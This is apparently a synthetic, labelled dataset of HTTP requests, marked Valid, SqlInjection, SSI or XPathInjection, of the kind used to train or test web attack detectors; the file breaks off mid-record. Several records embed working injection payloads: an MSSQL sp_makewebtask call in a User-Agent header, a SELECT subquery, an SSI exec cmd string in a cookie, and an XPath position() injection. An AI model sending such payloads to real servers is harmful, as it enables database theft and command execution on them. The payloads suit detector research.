Date: Sat, 27 Dec 08 21:40:28 UTC
ETag: W/"H_axWP2L8eMuW@t72"
Expect: 100-continue
From: lraeI@n6eai.de
If-Modified-Since: Fri, 25 Jan 08 03:50:08 UTC
If-Unmodified-Since: Tue, 16 Feb 10 09:13:13 CET
If-Match: "aOpsFIEn0t1cyy15pzX"
If-None-Match: "xG7p.@VcR5OS9eO@I"
If-Range: "I8MgJsLA@ljjnonF9xar"
Max-Forwards: 26
MIME-Version: 5.1
Pragma: awvrllt5='tsehd'
Proxy-Authorization: rahe cmte4Hz=rntcz1cz
Authorization: Digest nc=f1dec510
Range: 7593-23,41-590
Referer: http://www.o4hTcynt.st/EeWoro/neYacR/neeieite/phkuoyo/4Stgnmi.swf
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: s9LVmD8 http://www.mIeqgtc.be
UA-CPU: Sparc
UA-Disp: 3788,441,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3083x039
Via: 9.7 www.nh5umoe.htm, 9.1 157.192.163.68, FTP/6.2 233.163.47.167
Transfer-Encoding: gzip
Upgrade: eht/0.1, daroy/6.1, dh2hn/7.4, 6nar/5.6
Warning: 961 www.ntijm.html "estseteardr" "Thu, 20 Mar 08 23:35:03 CET"
X-Forwarded-For: 24.38.239.223
X-Serial-Number: 3858691762
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8460
Start - Id: 6131
class: Valid
POST /3osivo6tT5sue2/mqdes4ceads/NtAr9Srtm9axsi/autoexeclocationnpassthru4bbk5wfs/hrSTdaaiiemOjr0ey/ooazz/ehM@eSQsYHKkyS7/hueeaw1rlehajaevicO/fm2/tF.jpg? HTTP/1.0
Content-Length: 50
Content-Language: hhSiepa,e
Content-Encoding: compress
Content-Location: /ecqeyfS0/Gvv8gir/RthoLm/asecfuab/zr8oh.jpg
Content-MD5: Mm9jNmVsZXRPeXRmZXRubg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Apr 04 19:07:42 GMT
Last-Modified: Mon, 06 Aug 07 16:25:00 CET
Host: 130.181.24.86:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i, iso-2022-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: a=cchiterE
Client-ip: 2.7.31.61
Cookie: ni=3249
Cookie2: $Version="901"
Date: Sat, 14 Apr 07 23:52:17 UTC
ETag: W/"_FBDSU67b-wSnH9-"
Expect: 100-continue
From: Etnnkns@tnee.fr
If-Modified-Since: Tue, 19 Jun 07 03:16:40 UTC
If-Unmodified-Since: Wed, 18 Apr 07 05:21:08 GMT
If-Match: *
If-None-Match: "OALIR4HglQOnc@@"
If-Range: Sat, 28 Feb 09 22:47:08 CET
Max-Forwards: 8936
MIME-Version: 2.7
Pragma: eobCeex=ox
Proxy-Authorization: Digest algorithm=cedo
Authorization: sasap heea=Vreahc3
Range: -340133,256518-,-55124
Referer: http://www.sxtgcsAA.com/nofiet/trt7keat.txt
TE: trailers,deflate,chunked;q=0.3
Trailer: Via
User-Agent: Mozilla/7.1 (compatible; cdltws; Mac OS X; lehaimj; fhIs)
UA-CPU: StrongARM
UA-Disp: 8680,157,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7265x3057
Via: Neqreu/1.2 31.96.129.45
Transfer-Encoding: gzip
Upgrade: hUaed/9.4, n1r/4.5, n0p/2.3
Warning: 335 www.isiR.js "eyuxr" 
X-Forwarded-For: 150.210.233.126
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hcihWubtn5cvahs=47308506&of5Thtt=Ti&dlatmrIa8=1169

End - Id: 6131
Start - Id: 19300
class: Valid
GET /nt/ezdssqfeko/mpA23/inXg/G5BZUuXhOwRkc./F1YmaillikeRF/7ZWoKLmz4JuTZM/ssee/tzu0dgtdeihcsib/uAd/e23wv/ibGj9mOEL4dGE.js?feica2fvina4ep=nodeu%2Bnnagau3r%7EtneTo&syzDon=%3Dqraiframe0di2owp-&jCAsslrnfe=rlr+msgt8adlqop&jPCdF.y8M.r=etarhuhOibsastSao&oinM5pctdnSu=tcrm9drqinput&smega37s=ewurot+jr HTTP/1.0
Host: www.aYzi4.net
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1252;q=0.7, iso-8859-8-i, shift_jis, x-mac-greek, euc-jp;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=957
Client-ip: 74.7.105.82
Cookie: ottcotet8=o;ornheguc=o(a
Cookie2: $Version="15"
Date: Sun, 23 Jan 05 08:09:14 GMT
ETag: W/"LeVKcrgqvr6zKr57MVb"
Expect: 100-continue
From: eiioel@i3bTr2frih.st
If-Modified-Since: Tue, 01 Nov 05 11:17:02 CET
If-Unmodified-Since: Tue, 24 Jul 07 02:35:08 GMT
If-Match: *
If-None-Match: *
If-Range: "Mhi3drEu47@.pm-KZVuo"
Max-Forwards: 813
MIME-Version: 3.8
Pragma: zh='co'
Proxy-Authorization: NTLM MWlEbGV0YW1aaEVnNUdZeHQxb2hhb2RvaEhybmVkaXlsZGU1STM=
Authorization: Basic YUF0bmVubmk6c2dzYWVt
Range: 418-281288
Referer: http://www.Edtpsd.uk/NqwhtaqJ/beeAEa/oEtsInag.png
TE: deflate;q=0.5,trailers
Trailer: Cache-Control
User-Agent: Mozilla/9.8 (X11; U; Linux i586 0.2; ti-Ia; rv:1.8.0) Gecko/89803545
UA-CPU: 68000
UA-Disp: 589,2791,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6244x6151
Via: HTTP/3.1 www.bimts7ba.css, HTTP/4.9 129.94.53.196, FTP/6.2 www.uay3vogh.tiff
Transfer-Encoding: compress
Upgrade: earoeu/7.9, ifetz/3.5, tges/2.9, Heu/7.4, ihfoks/9.4
Warning: 303 143.220.33.216 "entfvdtChoEcrKgtdi8" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 0947873125180577061
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19300
Start - Id: 16585
class: Valid
GET /oud9tdiA/da.php3?eefe3peeetfE=87005459&vaaer=agl0m&dninW9tg3=fGuNQ&8atstenu0ten=fc1ca&keyaita=catgfi&aPtyy9lwotlq=zommbar0&dg=17923&hshutdown29ppL1FH=91&xdslaor=ne%3DI HTTP/1.0
Host: 227.173.43.103
Connection: close
Accept: audio/basic, image/gif
Accept-Charset: iso-2022-kr;q=0.2, x-mac-chinesesimp, cp-932, euc-jp, iso-8859-15
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 178.183.34.48
Cookie: ElvEj3Qcmd@IH=[h;mnloxpssds=134;rn7Tod= 'O;obntsmfiosOo0i=rf37aplS;P2fSjN=mieMedpygeen
Cookie2: $Version="3"
Date: Fri, 18 Nov 05 19:01:58 GMT
ETag: "xIL5214d.C@P9ihIOvZ"
Expect: ehorse
From: o7mnatoB@rrengt.ch
If-Modified-Since: Tue, 19 Dec 06 18:23:58 CET
If-Unmodified-Since: Fri, 21 Sep 07 03:15:49 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 23 Feb 09 18:14:28 GMT
Max-Forwards: 0855
MIME-Version: 4.5
Pragma: a='eco'
Proxy-Authorization: Basic dHRhRWVvdDoydGViRWUydQ==
Authorization: rD0oSh clsswh=3inrn
Range: -508053,86460-25,-68
Referer: http://hrUsx.de/0idd/yabnovxi/nelt8nnt.php
TE: trailers,chunked
Trailer: Connection
User-Agent: aisheh (gXfin08; r63NIk; wLQJ7PreuW)
UA-CPU: 68000
UA-Disp: 270,3483,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7789x534
Via: cetaw/3.4 18.93.44.218:32
Transfer-Encoding: gzip
Upgrade: meeo4e/6.0, fs9/7.5, t1neom/2.3, itiUes/5.9, aenam/1.7
Warning: 814 www.voei.html "EeerSs70as0tnwt" "Fri, 04 Sep 09 15:39:04 UTC"
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 16585
Start - Id: 41162
class: SqlInjection
POST /tBmGvsyTwa.AXvtk/eCfXbemyh7itat/Rssplwlkh3vtesn/iieH/Jy6C.andqcPEHz/Tal/y0mhtbewtgftg/wu/oh.jpg? HTTP/1.1
Content-Length: 172
Content-Language: ehrsnn2t
Content-Encoding: deflate
Content-Location: /thyiXe.tiff
Content-MD5: dG9wYWw3cDdtMnRONXRlag==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Aug 08 12:29:51 UTC
Last-Modified: Wed, 26 Jul 06 02:07:03 CET
Host: www.islLdiTNe.st
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987, cp-950, koi8, hz-gb-2312
Accept-Encoding: *
Accept-Language: HAseaEy-eh, 3e-mhtngi;q=0.2, ntQegd-iqhg
Cache-Control: max-age=074
Client-ip: 87.103.106.213
Cookie2: $Version="0"
Date: Wed, 25 Nov 09 07:34:36 UTC
ETag: W/"or6uhqWDtkercfGxMpjb"
Expect: 100-continue
From: ohmjin2@3p7ntngp.com
If-Modified-Since: Fri, 11 Dec 09 24:02:56 GMT
If-Unmodified-Since: Fri, 01 Feb 08 13:59:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 46
Pragma: no-cache
Proxy-Authorization: NTLM bmRlbjNlZWVuZW9hdG91NWFxYUlJc2VnZGdvaWM1YWFsc21rYQ==
Range: 921301-
Referer: http://t0ek6.com/d8yi/ytin/i4noHexz.cgi
TE: trailers,trailers,gzip;q=0.4
User-Agent: ';  EXEC     master.dbo.sp_makewebtask  'c:\inetpub\wwwroot\cr.shtml',    'SELECT  sv FROM i2sif  WHERE   xtype=''U'''
UA-Disp: 088,9150,32
UA-OS: Win9x
Via: 4od/5.7 www.oREtmeY.shtml:5916, 4.5 www.ewoei82.html:4207
Transfer-Encoding: aqpaNE
X-Serial-Number: 537097395202969976
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lfrar9vsor=trcstp dtn<o0c| &RME0log0qf=i4b&Tpa8=vPgB5dbxIl&hLKWDpassthruE6@=shUiTToba&ecfiiwpTahRr5rt=rnpn&2E8e=dxqEt1R&tlkAe=af)group bycmd&iz=eCJoQ3dOlYRc&ua=625011

End - Id: 41162
Start - Id: 18292
class: Valid
GET /t5FmC6eUhTar-2sSH8CM.js?r8hum4yyebtona=adBRL&t-QwK=dopenshusr1ro+4sn%28shotinexec&u0acceptKoGTVWOH=us3&rynyI=c+alocationFin&pe=rv&rl0=o7 HTTP/1.1
Host: 44.231.194.170
Connection: close
Accept: image/jpeg;q=0.7, application/postscript;q=0.0, text/*;q=0.4
Accept-Charset: euc-jp, windows-1254;q=0.7, iso-8859-4;q=0.5
Accept-Encoding: gzip, deflate, compress, deflate
Accept-Language: hterb-Ihvlecv, iEi-Rn;q=0.6, enuele-mVptaeo, reahleRb-oftiet1e
Cache-Control: max-stale
Client-ip: 71.143.27.9
Cookie: heo0brgjret=n9CgZmOYCpfK;iazs1SoriFwr=407;njtissa=5yQj
Cookie2: $Version="49"
Date: Fri, 23 Dec 05 24:05:57 GMT
ETag: W/"-OIBTzgdGlttzSFl"
Expect: er8Rh
From: tdgpai@cdetEa3.uk
If-Modified-Since: Tue, 02 Feb 10 09:40:03 GMT
If-Unmodified-Since: Fri, 07 Aug 09 19:57:52 GMT
If-Match: *
If-None-Match: *
If-Range: "I7W-k2dWRgcbPyxO"
Max-Forwards: 5
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: tOws weren2rT=4eqgot
Authorization: oezd gpzri=1vzeoha9
Range: 55116-
Referer: /lz7xi/u3ia/eIroAt0n.mdb
TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.1 (Machintosh; U; PPC Mac OS X 6.0; a4-ph; rv:2.2.8) Gecko/64870695
UA-CPU: MIPS
UA-Disp: 372,7656,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7711x8237
Via: 3.9 www.o35t.jpg, 7.0 8.155.202.161:7595
Transfer-Encoding: identity
Upgrade: dtoa/8.6, tysts/7.5, rrg/6.2, sDwb/3.9
Warning: 976 www.eoEas.jpg "rrr4ocEA9Sfs0d" "Tue, 11 Jul 06 23:30:39 CET"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 9583617026420490127
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18292
Start - Id: 40856
class: SSI
GET /lhIbonEtasazkI/eGlXnCPVfSlMid8Soe.htm?tnAcsq=+ts&e8aAheEtErPleT=woDolsnia&2YTQ=tsiiee1&ro=2102&tm=81&tiee9turni1=tO5hia%3Am&1h0k72zw2HS0Pma=d&odf=%3C%21--%23odbc++++statement+%3D++++%22select++++ixmngg%2C+++rftl%2C+++++e4+from+++o6shsewe+order++++by+5%2C+++85%2C+6%22+--%3E HTTP/1.0
Host: 48.162.224.236:01
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=94
Client-ip: 183.188.60.40
Cookie: vcjedwCe=trFN h0oe6dr;eh=8879;cu4cjtj=zh;tgh=da4linW;rkFeqdsrci=wzworh6twnaf
Cookie2: $Version="05"
Date: Wed, 27 Oct 04 16:51:38 GMT
ETag: "l8YqCEbciYrBlazH.KJE"
Expect: ahutgh=Zrti
From: ednaAi@brso.de
If-Modified-Since: Fri, 13 May 05 10:08:37 GMT
If-Unmodified-Since: Fri, 16 Jan 09 06:18:28 GMT
If-Match: "rLXOf-sX4kvRuBhhDZ"
If-None-Match: "AMdJCXfSuBH4qsvW2"
If-Range: *
Max-Forwards: 21
MIME-Version: 2.6
Pragma: aErmoT='na'
Proxy-Authorization: NTLM b2xRbmFjZWVwOW41c28yYWxxZUw3Um1kaXJJdXNvZW5ubHZoZGU2ZG1hZ2ls
Authorization: Basic ZmVsb2Vtcjpuc3NlZWVhbA==
Range: 662370-,944629-04,749394-
Referer: http://5g8eeD.de/3bmUI.shtml
TE: chunked;q=0.7
Trailer: Date
User-Agent: Mozilla/2.6 (Machintosh; U; PPC Mac OS X 0.1; 4e-2e; rv:0.5.1) Gecko/98048040
UA-CPU: x86
UA-Disp: 2426,7787,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: 2.9 90.244.195.150, HTTP/7.6 87.13.219.156, Hnyo/4.2 www.sikrphth.html
Transfer-Encoding: compress
Upgrade: iTdaap/8.9
Warning: 001 94.18.227.26 "tarnYgrgo4d" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40856
Start - Id: 39886
class: SSI
GET /Taccess_log9zAE./bOntqycL/nn6cPM5JPPLMQ7JxQ/tYDykcbL0_J@Z/oalenguieEsrien/yirtnInixosl/hlBu2jGjv.jsp?nz7zZ.rgQUq=4lopen&zosAtrij6=ilM3&ohknnIpgsh0n=ghwaweaagi6Iuomc&swd5x8thcoelsfc=4824 HTTP/1.0
Host: 196.166.186.116
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: lietde0e-ednvaex, t-oaater, Rraaolf3-npq, uh5nrEn-nottre;q=0.9
Cache-Control: max-stale
Client-ip: 53.6.225.107
Cookie: -S080=an$0ni+ldocument+yevj;ZasQ=phpidelocation9 t[prftjimg;s/<;e4w=61015;TnedeoWlHthroa=irndHdqvfzstaal;nhleltNPcdu=<!     #<!--#exec    cmd="id"-->
Cookie2: $Version="4"
Date: Fri, 08 May 09 07:41:51 CET
ETag: W/"xwSpASwJ5TKNNH2_n@"
Expect: 100-continue
From: eepeaoE@tiebrz0l.it
If-Modified-Since: Mon, 04 Jun 07 13:14:02 GMT
If-Unmodified-Since: Fri, 12 Oct 07 08:58:23 GMT
If-Match: "oXktE4YcW_iFulGCGWQ"
If-None-Match: *
If-Range: "3cn1pP_WeP4Nu._rqH.d"
Max-Forwards: 0
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: htAfoe Nnews=uqske3p
Authorization: NTLM b3J0YXRUZGVoaVR1ZG51d3I5aXNyM3Q4aWNoZW5pODJhbG1kaXBpc3M=
Range: 74847-,148-592,59804-
Referer: http://iiuyelse.be/yI30gns/lsj9hDw.ace
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: Mozilla/0.1 (X11; U; Unix 3.9; 3A-5t; rv:3.1.6) Gecko/48408408
UA-CPU: x86
UA-OS: Solaris
UA-Color: color8
Via: HTTP/5.5 www.isuasid2.js, 6.6 www.twi3iETu.jpg, 1.9 www.mnmtNaa.html:8
Transfer-Encoding: gzip
Warning: 064 www.teeNR.png "no5hreoabgsitt5egaT" 
X-Forwarded-For: 221.153.20.56
X-Serial-Number: 54810221590
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39886
Start - Id: 42551
class: SqlInjection
GET /aLinodvoehiiPipaaac/taIyan/vcopyfSK2optPfvS/-e3xcCOand/Pn/errfCGRogOo/euWv6.8TnEdxD9xPf.html?i2nzaog=9473&7YgLUnph-0D_6y=lgs7e3Sb5tnsdeletej&eheosUo7=3753&neDsiw93ei5e=85984793&PnodeXN@JE6Y53=6e%40oe&K75H_3=3517&rckaditthltye6s=9102&QnzkqvQK=6121790&surde=%27++++%2B+++%28+SELECT++++TOP++++1+++++thelaya++++FROM+++dcr0p%29+++%2B+++%27 HTTP/1.1
Host: www.ywnutH.be
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 63.14.152.225
Cookie: BAbotorI=sQ0-c2aI8;lasakteprgsws=tgfprocessing-instruction4nwhtsi9fj;ywzexh1ot5oo7=34
Cookie2: $Version="597"
Date: Sun, 22 Feb 04 06:35:33 UTC
ETag: W/"LEVaDfsyAKfrIXNnW"
Expect: 100-continue
From: ecsnelg0@jkwTHolpio.fr
If-Modified-Since: Sat, 12 Dec 09 07:49:49 GMT
If-Unmodified-Since: Fri, 24 Dec 04 18:24:18 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 6848
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: -23041,40-95155,61918-
Referer: http://4xsrl.cz/oeac/rsD2.dll
TE: trailers,gzip;q=0.8
Trailer: Via
User-Agent: nptter (iWRaWf)
UA-CPU: x86
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: FTP/3.6 www.ecEnrj.js
Transfer-Encoding: compress
Upgrade: i5oae/7.4
Warning: 630 www.a0shtex.tiff "wilAeNfut" "Fri, 18 Nov 05 04:48:10 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42551
Start - Id: 35731
class: XPathInjection
GET /Heos/i@/n7y0vYccttWqUQpGt/i3N9ntu6aractzpe/yesbgiteliErpex/um/3WSS59q23Z8jEq9/sfstixnC3IzN.sh?ntleo=emsruTrneocej&7Ruo=6&setN=iloeqttod&sogwa=tHn3WJsN&ud=lrnaOkicretcd&nodeA34Vx3KK71etc=c.67CT&eia3pt9e0eoth=5locationaxtermselect&solearpuSehSsrI=y8S2wpatha&EivqrV10aB=linka6&phxeW=cmGoaem&0nRsefml=4349394657&soaow2ifxoin=74&nnnrifkaxaeeiGy=teqeoeeaeo1meee&_26D2ZJ__DFD=llwl&iqeaz=ee%27+or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++++%27saTsc%27++++%3D++++%27 HTTP/1.0
Host: www.cpiheen.st
Connection: close
Accept: audio/*;q=0.2
Accept-Charset: koi8-r;q=0.2, windows-1255
Accept-Encoding: *
Accept-Language: s-eshg0;q=0.9, Bis-czaidi, etorlder-p;q=0.9, eEr7-Tlodhtct
Cache-Control: no-cache
Client-ip: 36.164.45.166
Cookie: rrr1=94796;xhvs-cHI=Jo@hi;ihCmS7SInodeLY=4688481
Cookie2: $Version="6"
Date: Mon, 07 Jul 08 12:25:07 GMT
ETag: "@h5CKoF7ijyntN2r"
Expect: 100-continue
From: dkgpi@e0eolroeA.ch
If-Modified-Since: Sun, 11 Oct 09 07:56:40 CET
If-Unmodified-Since: Sun, 25 Jun 06 23:14:26 CET
If-Match: "o_b_lmCf8w3dYtr"
If-None-Match: *
If-Range: Mon, 16 Feb 04 22:31:17 CET
Max-Forwards: 12
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Z3Ntc2hscmZlTk5vc3JpYWVsYWVubGV0SWVhZ25lTXNueDl3c2VOeXN0cGVybnJh
Authorization: Digest nonce
Range: 820401-
Referer: /oterwn/k597oe.tiff
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/5.3 (Windows; U; Win98 2.5; rt-SD; rv:5.1.6) Gecko/01176887
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: nheut/5.6 www.koiaIej.png, 9.7 www.rs08gan.tiff, 5.5 156.74.254.199
Transfer-Encoding: deflate
Upgrade: prjil/8.6
Warning: 495 www.nishee.css "pnuvl" "Sat, 05 Jul 08 22:36:12 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 126041771570096080
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35731
Start - Id: 17793
class: Valid
GET /Sr/etHo/lB5c.CNIUJTJgx1_W.jpg?rmkweo=mxieB1-Gl-w7&EaaHal4dscacs=n8u4ejks6dZs&menhnkwwp9o=jew HTTP/1.1
Host: 92.78.193.209:26998
Connection: onamnH4
Accept: text/*;q=0.0, application/x-tar;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, deflate;q=0.3, identity
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 32.57.20.18
Cookie: iiqtbtNeuerfOat=861385
Cookie2: $Version="7"
Date: Tue, 19 Sep 06 22:25:16 CET
ETag: W/"_vPuMsZzKZ_7lToRk9"
Expect: th3o=5trew;th2aea=uimsleh
From: pEoshjbx@ooitatrN.gov
If-Modified-Since: Tue, 14 Dec 04 08:13:51 CET
If-Unmodified-Since: Mon, 26 Jun 06 14:11:58 UTC
If-Match: *
If-None-Match: "BBhRjRkpG1SqFwtA"
If-Range: Fri, 20 Jul 07 02:43:28 UTC
Max-Forwards: 444
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM NmVnaWhlaUJpcE5zTmVvb3R1bW4yc2NBcjRlRXFFckVvTmhvbG4=
Authorization: Basic c2JTRWFvOmlpZGVlYnIy
Range: -412,3-43798
Referer: http://www.swlel.gov/testE/vsch6/ewlr8t/sewn7m/ahit2.js
TE: deflate;q=0.9
Trailer: Max-Forwards
User-Agent: h5r5/9.4.0.8
UA-CPU: StrongARM
UA-Disp: 4032,6122,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 942x1602
Via: 2.7 32.164.180.27:01, 2.2 www.6btrlreh.jpeg
Transfer-Encoding: compress
Upgrade: letel/4.6, ra8cNh/8.7
Warning: 685 www.cMeV7n.jpg "Rshilnhailrb" "Fri, 30 Apr 10 23:05:54 CET"
X-Forwarded-For: 116.27.197.85
X-Serial-Number: 990081
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 17793
Start - Id: 27325
class: Valid
GET /oe0iiszduibiea0oan/bdBmk/2Wx5/0JuUv3BHR6/jye1eihYbGnCeudRhosA.html? HTTP/1.1
Host: 255.86.226.89
Connection: close
Accept: video/*;q=0.2, application/*;q=0.6
Accept-Charset: x-mac-roman;q=0.7, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 47.126.124.55
Cookie: ri9mz89tfeulvt=eia1u3m;qreEte=ovete;Ionff=neefUlInv9stnyiKae;vogauhptnw=<qd;yceuf=035337;twcaaesUhigen=r=t
Cookie2: $Version="7"
Date: Mon, 09 Jul 07 18:37:07 CET
ETag: W/"@QdiiYUnF9uBxKPJ"
Expect: 100-continue
From: vwlot@te9enkmla.fr
If-Modified-Since: Thu, 21 Oct 04 03:22:05 GMT
If-Unmodified-Since: Sat, 12 Sep 09 04:21:59 CET
If-Match: "6oLNb5vQc882yZUB"
If-None-Match: "l-qDq5SkbrE0qSfz4_d"
If-Range: "I5-MGzRqkH86ZCz"
Max-Forwards: 6952
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM ckVlaDJuRU5hZWhqb3RkMWVrdW5uZTlvc2h1cHRyYW9k
Authorization: tmhbeh 3St6=sinI
Range: -49505
Referer: http://www.dosnap.org/pqedhts/aOeoseet/yt0mkt/azv4.fgf
TE: gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: Dm5oxbboni/9.8.5.2
UA-CPU: x86
UA-Disp: 3109,349,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3599x969
Via: uamhk/9.4 182.0.104.248, 9.4 www.8roS.html:56119, HTTP/0.6 www.oemtaeo.gif:81099
Transfer-Encoding: gzip
Upgrade: hosi/6.4, mbe/1.4, ewo/1.2, e7974/0.6
Warning: 310 www.wIblei.png "anibiOgti2Un" "Sun, 21 Feb 10 08:44:37 CET"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 99615814182881268
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27325
Start - Id: 25016
class: Valid
GET /aIomrorroihun/mknisaig/Edns6eezgmhsnawt5/oTJ/gRkgryDoqt/uP/3WIru/vH80c0E7S/rceGS2Jx/3uennoatnCrtiot/hXAL2ZkLO6jt.php?TxUW=db%25us&oir=ytp%3CX68s%3E%252meta%26%7Cf&a8ncgztia=4231516894&ytiA=n63ayzFnihcm&spgnzrtnnerscqe=989&@Wi3dSBtelnetEV=Rixshutdownn&VH7_=gu&atseeRAya=3044453&eIete4=betweenracmddet70d%5C&mHlnothqT=cm0NgCq_zYU3&i8Yzwwinntlsoptc5_=70420599&eio=83826938&execUa0Rmeta6pfrq=3360 HTTP/1.1
Host: 166.172.70.94
Connection: oustpnr
Accept: audio/basic, video/*
Accept-Charset: cp-936, windows-1254;q=0.4, windows-874, windows-1258
Accept-Encoding: 
Accept-Language: Sn-Emr, tew-ulnr;q=0.2
Cache-Control: 4wsrc='ndts'
Client-ip: 225.193.4.111
Cookie: UV.yF@=ytHmailsl group byisto dropgr;dwr=rel nsnsflg;1boue=5linkIa<a7hYlrmg TFy;cmr=r
Cookie2: $Version="2"
Date: Fri, 27 Jul 07 09:06:51 GMT
ETag: W/"axFIC6TyS.bPm_4C"
Expect: wnenobd=9tseS;0scLco=Oedtaad
From: nzwrNfc3@izathr7huy.uk
If-Modified-Since: Sat, 20 Dec 08 01:49:05 UTC
If-Unmodified-Since: Tue, 06 Dec 05 02:24:48 UTC
If-Match: *
If-None-Match: "T7JX4AT2COUMxb2zx"
If-Range: Tue, 18 Jan 05 16:13:02 CET
Max-Forwards: 33
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="lezief"
Authorization: Digest nc=C40B2b79
Range: 46-,280-2255,32588-
Referer: /no5aeaet/dna1li/3usi/lnirEbx.pl
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.3 (compatible; MSIE 2.7; Open BSD i386; hutTd; lrdfl0da; 0nm2)
UA-CPU: MIPS
UA-Disp: 0119,2506,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 669x906
Via: 2.9 www.atl6h1c.jpg
Transfer-Encoding: identity
Upgrade: obsc4n/7.8, swq/1.1, ireR/7.9, aum/7.7
Warning: 922 25.148.114.39:28474 "fmaasanertcaeR" 
X-Forwarded-For: 190.232.63.32
X-Serial-Number: 92423943597
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25016
Start - Id: 24588
class: Valid
GET /9GDMyjtyhZ@CWlgUP/tmAs_xlo/gdv9Sg71hpQB__JE8e_/Kn0tffcnale5/eD07Y7T7f3p3D7b0mPS/zdocument1VXG30vXayX/ay9juE.pX/pJiFPxU1Jgb/Qw./eawZroaooolbnnt.mdb?tlsdoSI8fvA=niHmiwngufIhAsnaeo&rronfaraSxMngse=5nonawtd&ltNoptPfAueise=069&thruewd0=m5oh&esenoisdp8=tiha&dns=iraoj&r3catawinntcp7=tN-Vq2fK&u4fs6tu=Alocation&ttzItaybisaingw=nCgh&lnuNpadeoh=nak&yerrdIhgs=46626405&itIo=6rwmwWWl&nmh=4 HTTP/1.0
Host: 191.235.149.44
Connection: close
Accept: image/*, image/png, text/*
Accept-Charset: x-mac-icelandic, x-mac-cyrillic
Accept-Encoding: gzip
Accept-Language: reio-au1b4;q=0.8, lsOlGiNo-r9eeHWse, kafb-psb6rn, KRo-aae, lsAot-u1bero;q=0.8
Cache-Control: no-transform
Client-ip: 57.188.20.112
